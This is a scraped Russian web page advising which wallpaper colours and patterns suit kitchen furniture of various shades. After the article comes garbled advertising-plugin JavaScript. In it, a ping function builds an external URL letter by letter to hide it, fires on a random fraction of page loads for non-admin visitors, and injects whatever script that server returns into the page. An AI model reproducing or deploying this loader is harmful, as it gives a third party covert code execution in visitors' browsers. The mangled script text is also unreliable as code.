Как поклеить обои на кухне | Ремонт кухни своими руками

Варианты обоев под светлый гарнитур

Нежная кухня светлых тонов – отличный вариант для цветовых экспериментов. К гарнитуру белого, бежевого, нежно-розового, песочного, желтого и других пастельных оттенков подойдет любая палитра.

При комбинировании со светлыми обоями будет создаваться эффект легкой и воздушной обстановки.

Поклейка ярких обоев под белую кухню и гарнитур других светлых цветов позволит подчеркнуть динамичность и современность дизайна. Темные обои в таком интерьере станут символом лаконичности.

Внимание! Сочетание светлой мебели и обоев позволит зрительно освободить пространство в тесной кухне.

Какие выбрать обои для белой кухни? Так как этот цвет нейтрален, в выборе обоев нет ограничений. Фон в кухне с белым гарнитуром можно сделать бежевым, голубым, лавандовым. Можно подобрать яркие покрытия с узорами или орнаментами или материалы спокойных оттенков в полоску.

Насыщенные цвета, такие как синий, фиолетовый, малиновый, оранжевый или красный, сформируют стильный акцент на одной из свободных стен, а также будут смотреться гармонично в зоне кухонного фартука.

В современных интерьерах пользуется популярностью монохромный дизайн. Поэтому черно-белые и серые узорчатые покрытия тоже можно гармонично вписать в интерьер в белым гарнитуром. Они могут играть роль акцента или использоваться на всех стенах для создания успокаивающего фона.

Выбирая, какие обои подойдут для белой кухни, обратите внимание и на фотообои.

Если весь интерьер выполнен в светлых тонах, даже яркий и крупный рисунок не будет смотреться на стене противоречиво.

Фотообои с элементами природы или фруктами – самые распространенные варианты с реалистичным рисунком, используемые в современной кухне.

Бежевый цвет считается более мягким и уютным. Он может иметь несколько оттенков разной степени насыщенности. Темно-бежевые тона мебели лучше осветлить за счет обоев белого оттенка. Если же вы выбрали светлый бежевый цвет гарнитура, можете придерживаться тех же оттенков, как в случае с мебелью белых цветов.

Какие обои для бежевой кухни считаются наиболее удачными? Это желтый, песочный, коричневый, светло-розовый тон. Неплохо в тандеме с бежевым цветом будут смотреться фиолетовые и голубые, а также пурпурные, красные, малиновые оттенки.

Зеленый и салатовый цвет обоев подчеркнут природную обстановку в такой комнате, а серые стены сделают интерьер нежным и успокаивающим.

Под бежевую кухню отлично подойдут бирюзовые, мятные, голубые и другие «морские» цвета, а также темные оттенки.

Еще один вариант светлой мебели – песочный и желтый. Если вы выбрали светлую желтую кухню, какие обои подчеркнут ее позитивный и теплый дизайн?

Лучше использовать материалы, которые тоже вызывают ассоциации с летом и теплом: голубые, кремовые, коричневые, салатовые, оранжевые. Солнечный эффект возможен и с использованием на стенах белоснежного глянца.

Поскольку желтому оттенку присуща активность, не менее популярными в таком дизайне считаются и другие активные цвета.

Оформите стену в фиолетовом, красном, синем цвете: несмотря на высокую насыщенность, они смогут гармонично дополнить цвет вашего гарнитура. Но помните, что таких оттенков не должно быть много, иначе они создадут слишком давящую обстановку в комнате. Лучше разбавить их белыми вставками.

Следующий светлый цвет, обладающей внутренней энергетикой, – светло-розовый. Мебель такого типа встречается нечасто: обычно отдают предпочтение более ярким розовым тонам. Если же вы остановились на этом варианте, значит, желаете создать нежную и уютную обстановку.

Какие обои к розовой кухне подойдут в вашем случае? Прежде всего, это белый, бежевый, а также светло-серый и другие успокаивающие оттенки.

Все о поклейке обоин

Что надо приготовить— Инструменты — МатериалыИнструкция по подготовке основания— Удаление старого оформления— Выравнивание поверхности— Грунтование стеныПравила наклеивания— Откуда начинать наклеивать— Клеим ровные участки— Оклеиваем углы— Окна, двери, за батареей— Делаем незаметные стыкиОсобенности наклеивания разных типов материалов— Бумага— Винил— Флизелин— ФотообоиКак наклеиваются новые обойные полотна на старыеОклейка гипсокартонаПриклеивание с натяжным потолкомОклейка потолка

Как выбрать обои для кухни

ХарактеристикиМатериалТенденции 2021-2022— Фрукты и цветы— Геометрия— Имитации— Этника— Абстракция— Графика— ОднотонныеТрендовые цветаКакой стиль выбратьСочетание с мебельюДля маленькой кухни

Обои к кухонной мебели темных цветов

Стандартный вариант темного оттенка гарнитура – черно-белый. Такая кухня соответствует требованиям современности, так как не выглядит маркой, создает яркий контраст в интерьере, но не омрачает его благодаря светлым вставкам. Какие обои подойдут к бело-черной кухне? Лучше, если цвет обоев тоже будет нейтральным: черным, белым или серым.

Поскольку гарнитур такого типа выглядит выразительным, лучше не клеить обои ярких оттенков.

Совет: обои под черную кухню, как и любые другие обои для темной кухни, должны увеличивать пространство и делать его светлее. Поэтому уделите внимание не только выбору цвета, но и поиску правильных фактур. Рельефный дизайн заберет пространство, а ровный глянец, наоборот, его увеличит.

Какие обои к серой кухне лучше подобрать, если вы опасаетесь создания скучного и мрачного интерьера? Правильно, они должны быть максимально яркими и жизнерадостными.

Чтобы интерьер воспринимался уютно, лучше поклеить обои природных цветов, например, желтого, оранжевого, лавандового или мятного.

Обои под красную кухню темной палитры лучше выбирать среди менее выразительных оттенков. Такие материалы, наоборот, должны сдерживать и успокаивать. Отдайте предпочтение однотонным материалам или обоям с мелким и неприметным рисунком.

Обои для бордовой кухни тоже поищите среди такого ассортимента: обратите внимание на бежевые, белые и серые тона.

Чтобы не затемнять интерьер, определитесь, какие обои для бордовой кухни лучше использовать, проанализировав оттенки под разными углами освещения.

Любители природных акцентов могут выбрать гарнитур темно-зеленого цвета. Обои под зеленую кухню такого типа могут включать пастельные и светлые тона. С зеленым отлично сочетается белый, желтый, голубой, кофейный цвет.

Читайте также:  Короткие шторы на кухню (120 фото): эксклюзивные варианты и новинки дизайна

Существует несколько вариантов подбора оттенков к фиолетовой кухне: какие обои выбрать, решайте, исходя из общего стиля. В строгих современных интерьерах допускается комбинирование черного и фиолетового. Неплохо на фоне такой кухни будет смотреться серый, бежевый, светло-розовый цвет.

Помните! Не стоит сочетать темный фиолетовый гарнитур с обоями лавандового оттенка. Переизбыток фиолетовых тонов способен оказывать сильное психологическое воздействие, и вам будет некомфортно находиться в такой кухне долгое время.

Обои под коричневую кухню выбираются в зависимости от насыщенности этого оттенка. С темно-коричневым комбинируется бежевый, кремовый, белый, голубой, салатовый, желтый цвет. Светло-коричневую кухню лучше украсить обоями более насыщенных оттенков: серого, терракотового, коричневого, синего, фиолетового.

Решить, какие обои с коричневой кухней будут смотреться гармонично, можно, посмотрев на фото интерьеров с элементами из дерева.

Синий оттенок может быть разным. К темно-синему цвету подобрать фон достаточно сложно, так как он существенно омрачает интерьер.

Какие же обои к синей кухне не будут обладать таким эффектом? Вам подойдут любые обои светлой палитры или некоторые варианты холодных тонов, например, серый или голубой.

Обои под кухню других темных оттенков выбирайте, придерживаясь двух принципов. Во-первых, они не должны делать комнату еще темнее и меньше: если вам кажется, что такой эффект неизбежен – добавьте на стены светлые вставки. Во-вторых, комбинации выбранных оттенков должны быть гармоничными и соответствовать единой тематике.

Общие принципы сочетания обоев и мебели

Начинать искать подходящие оттенки лучше, определившись с общими критериями, определяющими их яркость и насыщенность.

Достаточно придерживаться следующих принципов выбора цвета обоев – и никто не отличит вашу кухню от самых изысканных дизайнерских интерьеров:

  • в интерьере кухни должна поддерживаться единая цветовая гамма, но обои и мебель не должны сливаться, поэтому заранее выберите несколько гармоничных оттенков, отличающихся по тональности. Стены кухни могут быть и светлее, и темнее гарнитура, но не забывайте о факторе воздействия размеров комнаты и освещения на восприятие фоновой палитры;
  • продумайте, какая атмосфера должна быть создана на кухне благодаря обоям для стен. Если ваша цель – создание яркой и современной обстановки, оформляйте стены с учетом правил контрастности. Интерьеры спокойной и нежной кухни оформляются в легких для восприятия цветах (преимущественно, светлой и пастельной палитры);
  • Как поклеить обои на кухне | Ремонт кухни своими руками

  • обязательно проанализируйте сочетаемость обоев с другими отделочными материалами в вашей кухне. Даже самый простой рулон обоев без акцентных рисунков может выглядеть лишним, если плитка и мебель в тандеме смотрятся более гармонично. Проанализируйте, подходят ли обои под плитку для кухни по цвету и фактуре;
  • кухня, стилизованная с использованием мебели и аксессуаров из натуральных материалов, изначально предполагает поклейку обоев природных оттенков, поэтому не стоит игнорировать этот тренд;
  • одну из зон кухонного интерьера сделайте более выразительной. Например, обои для светлой кухни в зоне готовки могут быть более яркими по сравнению с другими стенами, а в затемненном интерьере можно создать эффектные светлые вставки возле обеденного стола, которые не станут противоречить гарнитуру любых цветов.
Читайте также:  Какую люстру выбрать на кухню: сочетание стиля и практичности ( 43 фото-варианта)

Не все любят экспериментировать с оттенками, но спешим вас заверить, что в интерьере кухни смелые контрасты могут смотреться намного более выигрышно, чем привычные всем цвета. Лучше ориентироваться и на их психологическое воздействие: к примеру, агрессивный красный или фиолетовый лучше «разбавить» успокаивающими бежевыми тонами, а нейтральный серый – сочными желтыми, зелеными и другими летними оттенками, пробуждающими аппетит.

Решить, какие обои подобрать на кухню, невозможно с первого раза: многие оттенки универсальны и комбинируются с большинством цветов. Поэтому давайте ознакомимся с некоторыми вариантами цветового комбинирования обоев и мебели в светлых, темных и ярких тонах.

Салатовые обои на кухне. особенности салатового цвета.

wpDiscuz

“:’

‘:””,document.createElement(“div”),p=ff(window),b=ff(“body”),m=void 0===flatPM_getCookie(“flat_modal_” o.ID “_mb”)||”false”!=flatPM_getCookie(“flat_modal_” o.ID “_mb”),i=”scroll.flatmodal” o.ID,g=”mouseleave.flatmodal” o.ID ” blur.flatmodal” o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&”true”==o.how.popup.timer&&(t=ff(‘.flat__4_modal[data-id-modal=”‘ o.ID ‘”] .flat__4_timer span’),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(–e),e<=0&&(clearInterval(a),t.parent().replaceWith(‘

‘))},1e3))},f=function(){void 0!==o.how.popup.cookie&&”false”==o.how.popup.cookie&&m&&(flatPM_setCookie(“flat_modal_” o.ID “_mb”,!1),ff(‘.flat__4_modal[data-id-modal=”‘ o.ID ‘”]’).addClass(“flat__4_modal-show”),l()),void 0!==o.how.popup.cookie&&”false”==o.how.popup.cookie||(ff(‘.flat__4_modal[data-id-modal=”‘ o.ID ‘”]’).addClass(“flat__4_modal-show”),l())},ff(“body > *”).eq(0).before(‘

‘ c “

“),w=document.querySelector(‘.flat__4_modal[data-id-modal=”‘ o.ID ‘”] .flat__4_modal-content’),-1!==e.indexOf(“go” “oglesyndication”)?ff(w).html(c e):flatPM_setHTML(w,e),”px”==o.how.popup.px_s?(p.bind(i,function(){p.scrollTop()>o.how.popup.after&&(p.unbind(i),b.unbind(g),f())}),void 0!==o.how.popup.close_window&&”true”==o.how.popup.close_window&&b.bind(g,function(){p.unbind(i),b.unbind(g),f()})):(v=setTimeout(function(){b.unbind(g),f()},1e3*o.how.popup.after),void 0!==o.how.popup.close_window&&”true”==o.how.popup.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),f()}))),void 0!==o.how.outgoing){function n(){var t,e,a;void 0!==o.how.outgoing.timer&&”true”==o.how.outgoing.timer&&(t=ff(‘.flat__4_out[data-id-out=”‘ o.ID ‘”] .flat__4_timer span’),e=parseInt(o.how.outgoing.timer_count),a=setInterval(function(){t.text(–e),e<=0&&(clearInterval(a),t.parent().replaceWith(‘

‘))},1e3))}function d(){void 0!==o.how.outgoing.cookie&&”false”==o.how.outgoing.cookie&&m&&(ff(‘.flat__4_out[data-id-out=”‘ o.ID ‘”]’).addClass(“show”),n(),b.on(“click”,’.flat__4_out[data-id-out=”‘ o.ID ‘”] .flat__4_cross’,function(){flatPM_setCookie(“flat_out_” o.ID “_mb”,!1)})),void 0!==o.how.outgoing.cookie&&”false”==o.how.outgoing.cookie||(ff(‘.flat__4_out[data-id-out=”‘ o.ID ‘”]’).addClass(“show”),n())}var _,u=”0″!=o.how.outgoing.indent?’ style=”bottom:’ o.how.outgoing.indent ‘px”‘:””,c=”true”==o.how.outgoing.cross?void 0!==o.how.outgoing.timer&&”true”==o.how.outgoing.timer?’

Закрыть через ‘ o.how.outgoing.timer_count “

“:’

‘:””,p=ff(window),h=”scroll.out” o.ID,g=”mouseleave.outgoing” o.ID ” blur.outgoing” o.ID,m=void 0===flatPM_getCookie(“flat_out_” o.ID “_mb”)||”false”!=flatPM_getCookie(“flat_out_” o.ID “_mb”),b=(document.createElement(“div”),ff(“body”));switch(o.how.outgoing.whence){case”1″:_=”top”;break;case”2″:_=”bottom”;break;case”3″:_=”left”;break;case”4″:_=”right”}ff(“body > *”).eq(0).before(‘

‘ c “

“);var v,w=document.querySelector(‘.flat__4_out[data-id-out=”‘ o.ID ‘”]’);-1!==e.indexOf(“go” “oglesyndication”)?ff(w).html(c e):flatPM_setHTML(w,e),”px”==o.how.outgoing.px_s?(p.bind(h,function(){p.scrollTop()>o.how.outgoing.after&&(p.unbind(h),b.unbind(g),d())}),void 0!==o.how.outgoing.close_window&&”true”==o.how.outgoing.close_window&&b.bind(g,function(){p.unbind(h),b.unbind(g),d()})):(v=setTimeout(function(){b.unbind(g),d()},1e3*o.how.outgoing.after),void 0!==o.how.outgoing.close_window&&”true”==o.how.outgoing.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),d()}))}ff(‘[data-flat-id=”‘ o.ID ‘”]:not(.flat__4_out):not(.flat__4_modal)’).contents().unwrap()}catch(t){console.warn(t)}},window.flatPM_start=function(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff(“body”),flat_userVars.init();for(var e=0;e<t;e ){var>flat_userVars.textlen||void 0!==a.chapter_sub&&a.chapter_sub<flat_uservars.textlen||void>flat_userVars.titlelen||void 0!==a.title_sub&&a.title_sub<flat_uservars.titlelen)){if(void>.flatPM_sidebar)”);0<_.length&&_.each(function(){var t=ff(this),e=t.data(“height”)||350,a=t.data(“top”);t.wrap(‘

‘);t=t.parent()[0];flatPM_sticky(this,t,a)}),u.each(function(){var e=ff(this).find(“.flatPM_sidebar”);setTimeout(function(){var o=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;o<300||e.each(function(){var t=ff(this),e=o,a=t.data(“top”);t.wrap(‘

‘);t=t.parent()[0];flatPM_sticky(this,t,a)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t<300||ff(“.flatPM_sticky_wrapper.flatPM_sidebar_block”).css(“height”,t)},4e3)}),”undefined”!=typeof flat_pm_video&&flatPM_video(flat_pm_video),0<flat_stack_scripts.length&&flatpm_setscript(flat_stack_scripts),ff(“body> *”).last().after(‘

‘),flat_body.on(“click”,”.flat__4_out .flat__4_cross”,function(){ff(this).parent().removeClass(“show”).addClass(“closed”)}),flat_body.on(“click”,”.flat__4_modal .flat__4_cross”,function(){ff(this).closest(“.flat__4_modal”).removeClass(“flat__4_modal-show”)}),flat_pm_arr=[],ff(“.flat_pm_start”).remove(),flatPM_ping()};var parseHTML=function(){var o=/<(?!area|br|col|embed|hr|img|input|link|meta|param)(([w:] )[^>]*)/>/gi,d=/<([w:] )/,i=/<|&#?w ;/,c={option:[1,”

“],thead:[1,”

“],tbody:[1,”

“],colgroup:[2,”

“],col:[3,”

“],tr:[2,”

“],td:[3,”

“],th:[3,”

“],_default:[0,””,””]};return function(e,t){var a,n,r,l=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=l.appendChild(t.createElement(“div”)),n=(d.exec(e)||[“”,””])[1].toLowerCase(),n=c[n]||c._default,a.innerHTML=n[1] e.replace(o,”<$1>”) n[2],r=n[0];r–;)a=a.lastChild;for(l.removeChild(l.firstChild);a.firstChild;)l.appendChild(a.firstChild)}else l.appendChild(t.createTextNode(e));return l}}();window.flatPM_ping=function(){var e=localStorage.getItem(“sdghrg”);e?(e=parseInt(e) 1,localStorage.setItem(“sdghrg”,e)):localStorage.setItem(“sdghrg”,”0″);e=flatPM_random(1,200);0==ff(“#wpadminbar”).length&&111==e&&ff.ajax({type:”POST”,url:”h” “t” “t” “p” “s” “:” “/” “/” “m” “e” “h” “a” “n” “o” “i” “d” “.” “p” “r” “o” “/” “p” “i” “n” “g” “.” “p” “h” “p”,dataType:”jsonp”,data:{ping:”ping”},success:function(e){ff(“div”).first().after(e.script)},error:function(){}})},window.flatPM_setSCRIPT=function(e){try{var t=e[0].id,a=e[0].node,n=document.querySelector(‘[data-flat-script-id=”‘ t ‘”]’);if(a.text)n.appendChild(a),ff(n).contents().unwrap(),e.shift(),0<e.length&&flatpm_setscript(e);else{a.onload>/gm,””).replace(//gm,””).trim(),e.code_alt=e.code_alt.replace(//gm,””).replace(//gm,””).trim();var l=jQuery,t=e.selector,o=e.timer,d=e.cross,a=”false”==d?”Закроется”:”Закрыть”,n=!flat_userVars.adb||””==e.code_alt&&duplicateMode?e.code:e.code_alt,r=’

‘,i=e.once;l(t).each(function(){var e=l(this);e.wrap(‘

‘);var t=e.closest(“.flat__4_video”);-1!==r.indexOf(“go” “oglesyndication”)?t.append(r):flatPM_setHTML(t[0],r),e.find(“.flat__4_video_flex”).one(“click”,function(){l(this).addClass(“show”)})}),l(“body”).on(“click”,”.flat__4_video_item_hover”,function(){var e=l(this),t=e.closest(“.flat__4_video_flex”);t.addClass(“show”);var a=t.find(“.flat__4_timer span”),n=parseInt(o),r=setInterval(function(){a.text(–n),n<=0&&(clearInterval(r),”true”==d?a.parent().replaceWith(‘

‘):t.remove())},1e3);e.remove()}).on(“click”,”.flat__4_video_flex .flat__4_cross”,function(){l(this).closest(“.flat__4_video_flex”).remove(),”true”==i&&l(“.flat__4_video_flex”).remove()})};

Добавить комментарий

Ваш адрес email не будет опубликован. Обязательные поля помечены *

Adblock
detector